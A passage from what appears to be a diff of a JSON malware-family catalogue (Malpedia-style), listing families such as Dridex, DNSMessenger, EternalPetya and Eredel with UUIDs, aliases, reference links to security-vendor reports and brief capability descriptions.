- "https://blog.malwarebytes.com/threat-analysis/2016/02/dma-locker-a-new-ransomware-but-no-reason-to-panic/",
- "https://blog.malwarebytes.com/threat-analysis/2016/02/dma-locker-strikes-back/",
- "https://blog.malwarebytes.com/threat-analysis/2016/05/dma-locker-4-0-known-ransomware-preparing-for-a-massive-distribution/"
- ]
- },
- "uuid":
"1248cdf7-4180-4098-b1d0-389aa523a0ed", - "value": "DMA Locker", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnsmessenger", - "https://blog.talosintelligence.com/2017/03/dnsmessenger.html", - "http://wraithhacker.com/2017/10/11/more-info-on-evolved-dnsmessenger/", - "https://blog.talosintelligence.com/2017/10/dnsmessenger-sec-campaign.html" - ] - }, - "uuid": "b376580e-aba1-4ac9-9c2d-2df429efecf6", - "value": "DNSMessenger", - "description": "DNSMessenger makes use of DNS TXT record queries and responses to create a bidirectional Command and Control (C2) channel. This allows the attacker to use DNS communications to submit new commands to be run on infected machines and return the results of the command execution to the attacker." - }, - { - "meta": { - "synonyms": [ - "Shelma" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.doghousepower", - "http://www1.paladion.net/hubfs/Newsletter/DogHousePower-%20Newly%20Identified%20Python-Based%20Ransomware.pdf" - ] - }, - "uuid": "14d3518a-d8cb-4fbd-80aa-8bec4fc8ad13", - "value": "DogHousePower", - "description": "DogHousePower is a PyInstaller-based ransomware targeting web and database servers. It is delivered through a PowerShell downloader and was hosted on Github." 
- }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.dorkbot_ngrbot", - "https://securingtomorrow.mcafee.com/mcafee-labs/ngrbot-spreads-via-chat/", - "http://stopmalvertising.com/rootkits/analysis-of-ngrbot.html", - "https://research.checkpoint.com/dorkbot-an-investigation/" - ] - }, - "uuid": "91191c0a-96d8-40b8-b8fb-daa0ad009c87", - "value": "NgrBot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.dorshel", - "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" - ] - }, - "uuid": "d3b5a884-1fd6-4cc4-9837-7d8ee8817711", - "value": "Dorshel", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.doublepulsar", - "https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/", - "https://github.com/countercept/doublepulsar-c2-traffic-decryptor", - "https://countercept.com/our-thinking/analyzing-the-doublepulsar-kernel-dll-injection-technique/", - "https://countercept.com/our-thinking/doublepulsar-usermode-analysis-generic-reflective-dll-loader/" - ] - }, - "uuid": "32984744-c0f9-43f7-bfca-c3276248a4fa", - "value": "DoublePulsar", - "description": "" - }, - { - "meta": { - "synonyms": [ - "DELPHACY" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.downdelph", - "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", - "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf" - ] - }, - "uuid": "e6a077cb-42cc-4193-9006-9ceda8c0dff2", - "value": "Downdelph", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.downeks", - 
"http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments/?adbsc=social69739136&adbid=826218465723756545&adbpl=tw&adbpr=4487645412" - ] - }, - "uuid": "c8149b45-7d28-421e-bc6f-25c4b8698b92", - "value": "Downeks", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.downpaper", - "http://www.clearskysec.com/charmingkitten/" - ] - }, - "uuid": "227862fd-ae83-4e3d-bb69-cc1a45a13aed", - "value": "DownPaper", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.dramnudge" - ] - }, - "uuid": "627a044b-1c84-409c-9f58-95b46d5d51ba", - "value": "DramNudge", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.dreambot", - "https://lokalhost.pl/gozi_tree.txt", - "https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality" - ] - }, - "uuid": "ac4fbbb0-9a21-49ce-be82-e44cb02a7819", - "value": "DreamBot", - "description": "2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n2014 Dreambot (Gozi ISFB variant)\r\n\r\nIn 2014, a variant of Gozi ISFB was developed. Mainly, the dropper performs additional anti-vm checks (vmware, vbox, qemu), while the actual bot-dll remains unchanged in most parts. New functionality, such as TOR support, was added though and often, the Fluxxy fast-flux network is used.\r\n\r\nSee win.gozi for additional historical information." 
- }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.dridex", - "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/", - "https://blogs.it.ox.ac.uk/oxcert/2015/11/09/major-dridex-banking-malware-outbreak/", - "https://securityintelligence.com/dridexs-cold-war-enter-atombombing/", - "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf", - "https://www.govcert.admin.ch/blog/28/the-rise-of-dridex-and-the-role-of-esps", - "https://www.cert.pl/en/news/single/talking-dridex-part-0-inside-the-dropper/", - "https://viql.github.io/dridex/", - "https://www.flashpoint-intel.com/blog-dridex-banking-trojan-returns/", - "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/" - ] - }, - "uuid": "b4216929-1626-4444-bdd7-bfd4b68a766e", - "value": "Dridex", - "description": "OxCERT blog describes Dridex as \"an evasive, information-stealing malware variant; its goal is to acquire as many credentials as possible and return them via an encrypted tunnel to a Command-and-Control (C&C) server. These C&C servers are numerous and scattered all over the Internet, if the malware cannot reach one server it will try another. For this reason, network-based measures such as blocking the C&C IPs is effective only in the short-term.\"\r\nAccording to MalwareBytes, \"Dridex uses an older tactic of infection by attaching a Word document that utilizes macros to install malware. However, once new versions of Microsoft Office came out and users generally updated, such a threat subsided because it was no longer simple to infect a user with this method.\"\r\nIBM X-Force discovered \"a new version of the Dridex banking Trojan that takes advantage of a code injection technique called AtomBombing to infect systems. 
AtomBombing is a technique for injecting malicious code into the 'atom tables' that almost all versions of Windows uses to store certain application data. It is a variation of typical code injection attacks that take advantage of input validation errors to insert and to execute malicious code in a legitimate process or application. Dridex v4 is the first malware that uses the AtomBombing process to try and infect systems.\"" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.dropshot", - "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", - "https://www.megabeets.net/decrypting-dropshot-with-radare2-and-cutter-part-1/", - "https://www.megabeets.net/decrypting-dropshot-with-radare2-and-cutter-part-2/" - ] - }, - "uuid": "cfdb02f2-a767-4abb-b04c-333a02cdd7e2", - "value": "DROPSHOT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.dtbackdoor" - ] - }, - "uuid": "cc5abb0c-7f33-4a82-a92e-0070fd602ba5", - "value": "DtBackdoor", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.dualtoy", - "https://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/" - ] - }, - "uuid": "8269e779-db23-4c94-aafb-36ee94879417", - "value": "DualToy", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.dubnium_darkhotel", - "https://blogs.technet.microsoft.com/mmpc/2016/06/09/reverse-engineering-dubnium-2/3/", - "http://blog.jpcert.or.jp/2016/06/asruex-malware-infecting-through-shortcut-files.html", - "https://securelist.com/blog/research/71713/darkhotels-attacks-in-2015/", - 
"https://labs.bitdefender.com/wp-content/uploads/downloads/inexsmar-an-unusual-darkhotel-campaign/" - ] - }, - "uuid": "309d0745-bbfd-43bc-b2c4-511592a475bf", - "value": "DarkHotel", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.dubrute", - "https://github.com/ch0sys/DUBrute" - ] - }, - "uuid": "2236a08f-dfbd-4f92-9d73-a895c34766ad", - "value": "DUBrute", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.dumador" - ] - }, - "uuid": "ea59906d-b5e1-4749-8494-9ad9a09510b5", - "value": "Dumador", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.duqu", - "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet_research.pdf" - ] - }, - "uuid": "7344cee0-87c9-46a1-85aa-0d3c8c9c8cc6", - "value": "DuQu", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.duuzer", - "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group" - ] - }, - "uuid": "a5eb921e-17db-46de-a907-09f9ad05a7d7", - "value": "Duuzer", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Dyreza" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.dyre", - "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/", - "https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates", - "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf" - ] - }, - "uuid": "1ecbcd20-f238-47ef-874b-08ef93266395", - "value": "Dyre", - "description": "" - }, - { - "meta": { - "synonyms": 
[], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.eda2_ransom", - "https://twitter.com/JaromirHorejsi/status/815861135882780673" - ] - }, - "uuid": "24fe5fef-6325-4c21-9c35-a0ecd185e254", - "value": "EDA2", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ehdevel", - "https://labs.bitdefender.com/2017/09/ehdevel-the-story-of-a-continuously-improving-advanced-threat-creation-toolkit/" - ] - }, - "uuid": "257da597-7e6d-4405-9b10-b4206bb013ca", - "value": "EHDevel", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.elirks", - "https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/" - ] - }, - "uuid": "eb189fd3-ca39-4bc7-be2d-4ea9e89d9ab9", - "value": "Elirks", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.elise", - "https://securelist.com/blog/research/70726/the-spring-dragon-apt/", - "https://www.accenture.com/t20180127T003755Z__w__/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf", - "https://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/", - "https://www.joesecurity.org/blog/8409877569366580427" - ] - }, - "uuid": "3477a25d-e04b-475e-8330-39f66c10cc01", - "value": "Elise", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.emdivi", - "http://blog.trendmicro.com/trendlabs-security-intelligence/attackers-target-organizations-in-japan-transform-local-sites-into-cc-servers-for-emdivi-backdoor/", - 
"http://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/", - "https://securelist.com/new-activity-of-the-blue-termite-apt/71876/", - "http://blog.jpcert.or.jp/2015/11/decrypting-strings-in-emdivi.html" - ] - }, - "uuid": "6bf7aa6a-3003-4222-805e-776cb86dc78a", - "value": "Emdivi", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.empire_downloader", - "https://twitter.com/thor_scanner/status/992036762515050496" - ] - }, - "uuid": "aa445513-9616-4f61-a72d-7aff4a10572b", - "value": "Empire Downloader", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Lurid" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.enfal", - "https://www.bsk-consulting.de/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/", - "http://la.trendmicro.com/media/misc/lurid-downloader-enfal-report-en.pdf", - "https://researchcenter.paloaltonetworks.com/2015/05/cmstar-downloader-lurid-and-enfals-new-cousin/" - ] - }, - "uuid": "2a4cacb7-80a1-417e-8b9c-54b4089f35d9", - "value": "Enfal", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.equationdrug", - "http://artemonsecurity.blogspot.com/2017/03/equationdrug-rootkit-analysis-mstcp32sys.html", - "https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/", - "https://securelist.com/inside-the-equationdrug-espionage-platform/69203/", - "https://cdn.securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf" - ] - }, - "uuid": "c4490972-3403-4043-9d61-899c0a440940", - "value": "EquationDrug", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.equationgroup", - "https://laanwj.github.io/2016/09/23/seconddate-adventures.html", - 
"https://laanwj.github.io/2016/09/17/seconddate-cnc.html", - "https://laanwj.github.io/2016/09/13/blatsting-rsa.html", - "https://laanwj.github.io/2016/09/11/buzzdirection.html", - "https://laanwj.github.io/2016/09/09/blatsting-lp-transcript.html", - "https://laanwj.github.io/2016/09/04/blatsting-command-and-control.html", - "https://laanwj.github.io/2016/09/01/tadaqueos.html", - "https://laanwj.github.io/2016/08/28/feintcloud.html", - "https://laanwj.github.io/2016/08/22/blatsting.html" - ] - }, - "uuid": "35c1abaf-8dee-48fe-8329-f6e5612eb7af", - "value": "Equationgroup (Sorting)", - "description": "Rough collection EQGRP samples, to be sorted" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.erebus", - "https://www.bleepingcomputer.com/news/security/erebus-ransomware-utilizes-a-uac-bypass-and-request-a-90-ransom-payment/" - ] - }, - "uuid": "479353aa-c6d7-47a7-b5f0-3f97fd904864", - "value": "Erebus", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.eredel", - "https://webcache.googleusercontent.com/search?q=cache:3hU62-Lr2t8J:hXXps://www.nulled.to/topic/486274-eredel-stealer-lite-private-having-control-via-the-web-panel-multifunctional-stealer/+&cd=1&hl=en&ct=clnk&gl=ch&client=firefox-b-ab" - ] - }, - "uuid": "acd2555d-b4a1-47b4-983a-fb7b3a402dab", - "value": "Eredel", - "description": "Eredel Stealer is a low price malware that allows for extracting passwords, cookies, screen desktop from browsers and programs.\r\n\r\nAccording to nulled[.]to:\r\n\r\nSupported browsers\r\nChromium Based: Chromium, Google Chrome, Kometa, Amigo, Torch, Orbitum, Opera, Opera Neon, Comodo Dragon, Nichrome (Rambler), Yandex Browser, Maxthon5, Sputnik, Epic Privacy Browser, Vivaldi, CocCoc and other Chromium Based browsers.\r\n\r\n- Stealing FileZilla\r\n- Stealing an account from Telegram\r\n- Stealing AutoFill\r\n- Theft 
of wallets: Bitcoin | Dash | Monero | Electrum | Ethereum | Litecoin\r\n- Stealing files from the desktop. Supports any formats, configurable via telegram-bot" - }, - { - "meta": { - "synonyms": [ - "ExPetr", - "Pnyetya", - "Petna", - "NotPetya", - "Nyetya", - "NonPetya", - "nPetya", - "Diskcoder.C", - "BadRabbit" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.eternal_petya", - "https://securelist.com/schroedingers-petya/78870/", - "https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/", - "https://securelist.com/from-blackenergy-to-expetr/78937/", - "https://medium.com/@thegrugq/pnyetya-yet-another-ransomware-outbreak-59afd1ee89d4", - "https://tisiphone.net/2017/06/28/why-notpetya-kept-me-awake-you-should-worry-too/", - "https://labsblog.f-secure.com/2017/06/29/petya-i-want-to-believe/", - "http://blog.erratasec.com/2017/06/nonpetya-no-evidence-it-was-smokescreen.html", - "https://blog.comae.io/petya-2017-is-a-wiper-not-a-ransomware-9ea1d8961d3b", - "https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-lost-salsa20-key/", - "https://www.bleepingcomputer.com/news/security/ransomware-attacks-continue-in-ukraine-with-mysterious-wannacry-clone/", - "http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html", - "https://labsblog.f-secure.com/2017/06/30/eternal-petya-from-a-developers-perspective/", - "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/", - "https://isc.sans.edu/forums/diary/Checking+out+the+new+Petya+variant/22562/", - "https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-yet-another-stolen-piece-package/", - "https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/", - "https://www.gdatasoftware.com/blog/2017/07/29859-who-is-behind-petna", - 
"https://www.crowdstrike.com/blog/fast-spreading-petrwrap-ransomware-attack-combines-eternalblue-exploit-credential-stealing/", - "https://www.crowdstrike.com/blog/petrwrap-technical-analysis-part-2-further-findings-and-potential-for-mbr-recovery/", - "https://www.theguardian.com/technology/2017/jul/03/notpetya-malware-attacks-ukraine-warrant-retaliation-nato-researcher-tomas-minarik", - "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/", - "https://threatpost.com/ukrainian-man-arrested-charged-in-notpetya-distribution/127391/", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/september/eternalglue-part-one-rebuilding-notpetya-to-assess-real-world-resilience/", - "https://www.welivesecurity.com/2017/10/24/kiev-metro-hit-new-variant-infamous-diskcoder-ransomware/?utm_content=buffer8ffe4&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer", - "https://securelist.com/bad-rabbit-ransomware/82851/", - "https://www.wired.com/story/badrabbit-ransomware-notpetya-russia-ukraine/", - "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/", - "http://blog.talosintelligence.com/2017/10/bad-rabbit.html", - "http://www.intezer.com/notpetya-returns-bad-rabbit/", - "https://www.riskiq.com/blog/labs/badrabbit/", - "https://www.fireeye.com/blog/threat-research/2017/10/backswing-pulling-a-badrabbit-out-of-a-hat.html", - "https://labsblog.f-secure.com/2017/10/27/the-big-difference-with-bad-rabbit/", - "https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-badrabbit-encryption-routine-specifics.html", - "https://www.washingtonpost.com/world/national-security/russian-military-was-behind-notpetya-cyberattack-in-ukraine-cia-concludes/2018/01/12/048d8506-f7ca-11e7-b34a-b85626af34ef_story.html" - ] - }, - "uuid": "6f736038-4f74-435b-8904-6870ee0e23ba", - "value": "EternalPetya", - "description": "" - }, - { - "meta": { - "synonyms": [ - "HighTide" - ], - "type": 
[], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.etumbot", - "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2014/06/ASERT-Threat-Intelligence-Brief-2014-07-Illuminating-Etumbot-APT.pdf", - "https://www.zscaler.com/blogs/research/cnacom-open-source-exploitation-strategic-web-compromise", - "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html" - ] - }, - "uuid": "91af1080-6378-4a90-ba1e-78634cd31efe", - "value": "EtumBot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilbunny", - "https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope", - "https://www.cyphort.com/evilbunny-malware-instrumented-lua/" - ] - }, - "uuid": "dc39dcdf-50e7-4d55-94a0-926853f344f3", - "value": "Evilbunny", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Vidgrab" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilgrab", - "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf" - ] - }, - "uuid": "438c6d0f-03f0-4b49-89d2-40bf5349c3fc", - "value": "EvilGrab", - "description": "" - }, - { - "meta": { - "synonyms": [ - "CREstealer" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilpony", - "https://techhelplist.com/spam-list/1104-2017-03-27-your-amazon-com-order-has-shipped-malware", - "https://threatpost.com/docusign-phishing-campaign-includes-hancitor-downloader/125724/", - "https://www.s21sec.com/en/blog/2017/07/ramnit-and-its-pony-module/" - ] - }, - "uuid": "e26579d9-1d93-4a3b-a41e-263254d85189", - "value": "EvilPony", - "description": "Privately modded version of the Pony stealer." 
- }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.evrial", - "https://www.bleepingcomputer.com/news/security/evrial-trojan-switches-bitcoin-addresses-copied-to-windows-clipboard/" - ] - }, - "uuid": "af3a3ece-e67f-457a-be72-7651bc720342", - "value": "Evrial", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Sabresac", - "Saber" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.excalibur", - "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies" - ] - }, - "uuid": "3cec2c3c-1669-40cf-8612-eb826f7d2c98", - "value": "Excalibur", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.exchange_tool", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", - "https://github.com/nccgroup/Royal_APT" - ] - }, - "uuid": "74f8db32-799c-41e5-9815-6272908ede57", - "value": "MS Exchange Tool", - "description": "" - }, - { - "meta": { - "synonyms": [ - "ExtRat" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.extreme_rat", - "https://www.fireeye.com/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html", - "https://malware.lu/articles/2012/07/22/xtreme-rat-analysis.html", - "https://community.rsa.com/community/products/netwitness/blog/2017/08/02/malspam-delivers-xtreme-rat-8-1-2017", - "https://www.symantec.com/connect/blogs/colombians-major-target-email-campaigns-delivering-xtreme-rat" - ] - }, - "uuid": "6ec2b6b1-c1a7-463a-b135-edb51764cf38", - "value": "Xtreme RAT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.eye_pyramid", - "https://securelist.com/blog/incidents/77098/the-eyepyramid-attacks/", - 
"http://blog.talosintel.com/2017/01/Eye-Pyramid.html" - ] - }, - "uuid": "a7489029-21d4-44c9-850a-8f656a98cb22", - "value": "Eye Pyramid", - "description": "" - }, - { - "meta": { - "synonyms": [ - "WillExec" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.fakedga", - "https://github.com/360netlab/DGA/issues/36", - "http://blog.talosintelligence.com/2017/10/threat-round-up-1020-1017.html", - "http://www.freebuf.com/column/153424.html" - ] - }, - "uuid": "31c248cb-51b5-4bb7-801f-d8520d2b5789", - "value": "FakeDGA", - "description": "According to Talos, this trojan injects into other processes, disables security features and tries to contact several domains, waiting for instruction.\r\n\r\nThere seem to be two versions of this malware: one with the FakeDGA-domains in plaintext, and one with AES-ECB-encrypted domains (using the Windows-API)." - }, - { - "meta": { - "synonyms": [ - "Braviax" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.fakerean", - "https://blog.threattrack.com/fakerean-comes-of-age-turns-hard-core/", - "https://0x3asecurity.wordpress.com/2015/11/30/134260124544/", - "https://www.exploit-db.com/docs/english/18387-malware-reverse-engineering-part-1---static-analysis.pdf", - "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/FakeRean#technicalDiv" - ] - }, - "uuid": "653df134-88c9-47e2-99a5-06e0406ab6d4", - "value": "FakeRean", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.faketc", - "http://www.welivesecurity.com/2015/07/30/operation-potao-express/" - ] - }, - "uuid": "6b0030bc-6e45-43b0-9175-15fe8fbd0942", - "value": "FakeTC", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.fanny", - 
"https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/#_1" - ] - }, - "uuid": "6d441619-c5f5-45ff-bc63-24cecd0b237e", - "value": "Fanny", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.fantomcrypt", - "https://www.webroot.com/blog/2016/08/29/fantom-ransomware-windows-update/" - ] - }, - "uuid": "29f4ae5a-4ccd-451b-bd3e-d301865da034", - "value": "FantomCrypt", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.fast_pos", - "http://documents.trendmicro.com/assets/fastPOS-quick-and-easy-credit-card-theft.pdf", - "https://blog.trendmicro.com/trendlabs-security-intelligence/fastpos-updates-in-time-for-retail-sale-season/", - "http://documents.trendmicro.com/assets/Appendix%20-%20FastPOS%20Updates%20in%20Time%20for%20the%20Retail%20Sale%20Season.pdf" - ] - }, - "uuid": "1bf03bbb-d3a2-4713-923b-218186c86914", - "value": "FastPOS", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.felismus", - "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments" - ] - }, - "uuid": "07a41ea7-17b2-4852-bfd7-54211c477dc0", - "value": "Felismus", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.felixroot", - "https://medium.com/@Sebdraven/when-a-malware-is-more-complex-than-the-paper-5822fc7ff257", - "https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html" - ] - }, - "uuid": "e58755ac-3d0c-4ed3-afeb-e929816c8018", - "value": "Felixroot", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Cridex", - "Bugat" - ], - "type": [], - "refs": [ - 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.feodo", - "http://contagiodump.blogspot.com/2012/08/cridex-analysis-using-volatility-by.html", - "https://feodotracker.abuse.ch/", - "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/", - "http://www.sempersecurus.org/2012/08/cridex-analysis-using-volatility.html" - ] - }, - "uuid": "66781866-f064-467d-925d-5e5f290352f0", - "value": "Feodo", - "description": "Feodo (also known as Cridex or Bugat) is a Trojan used to commit e-banking fraud and to steal sensitive information from the victims computer, such as credit card details or credentials." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ff_rat", - "https://www.cylance.com/en_us/blog/breaking-down-ff-rat-malware.html" - ] - }, - "uuid": "e701b875-8ade-434f-89ff-6c367099bfd8", - "value": "FF RAT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.fileice_ransom", - "https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/" - ] - }, - "uuid": "ed0b8ac9-973b-4aaa-9904-8c7ed2e73933", - "value": "FileIce", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Poseidon" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.findpos", - "https://researchcenter.paloaltonetworks.com/2015/03/findpos-new-pos-malware-family-discovered/", - "https://blogs.cisco.com/security/talos/poseidon" - ] - }, - "uuid": "ae914b9a-67a2-425d-bef0-3a9624a207ba", - "value": "FindPOS", - "description": "" - }, - { - "meta": { - "synonyms": [ - "FinSpy" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.finfisher", - 